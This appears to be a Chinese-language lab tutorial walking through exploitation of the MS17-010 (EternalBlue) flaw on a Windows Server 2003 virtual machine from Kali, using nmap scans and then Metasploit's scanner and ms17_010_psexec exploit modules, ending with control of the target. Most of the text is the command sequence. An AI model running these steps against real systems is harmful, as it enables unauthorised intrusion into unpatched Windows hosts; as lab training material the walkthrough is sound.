赞
踩
一台kali的,一台windows。
windows这台有永恒之蓝漏洞即可,2003,2008都可以。
我是用的cn_win_srv_2003_r2_enterprise_with_sp2_vl_cd1_X13-46432.iso
,装的是Windows Server 2003 Standard x64 Edition
ifconfig
ipconfig
nmap 192.168.206.0/24 #扫描指定网段中的ip、端口情况
nmap -sV -O 192.168.206.132 #查看该ip主机的操作系统
nmap --script=vuln 192.168.206.132 #对指定ip进行漏洞扫描
可以查看到192.168.206.132
的主机是windows2003
,并且对该ip扫描漏洞可以查看到ms17-010
漏洞。
msfconsole #进入msf安全框架
help #查看帮助
search ms17-010
可以看到有五个模块供我们选择。
use auxiliary/scanner/smb/smb_ms17_010
options #查看有哪些选项
可以看到右边有一些yes
和no
,用一个例子来描述就是,yes
是我们填表时的必填项,no
是选填项,所以我们观察yes
对应行的左边,有一个RHOSTS
和no
一样是空白的,那个便是需要我们填写的内容。
同时也可以看后面的Description
,The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
,所以这里填目标ip
。
set RHOSTS 192.168.206.132
options
再次使用options
命令可以看到刚刚空缺的位置已经填上了。
run
这两行英语啥意思自己可以翻译一下,我的理解就是主机里有ms17-010
漏洞,并且和msf安全框架中的漏洞匹配度是100%
search ms17-010
use exploit/windows/smb/ms17_010_psexec
此时就已经进入攻击模块了,然后像进入扫描模块一样,我们把必填项都填上。
options
set RHOSTS 192.168.206.132
options
此时可以运行了。
run
这个时候我们已经控制到windows2003
了,可以查看ip和当前路径~
over!
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。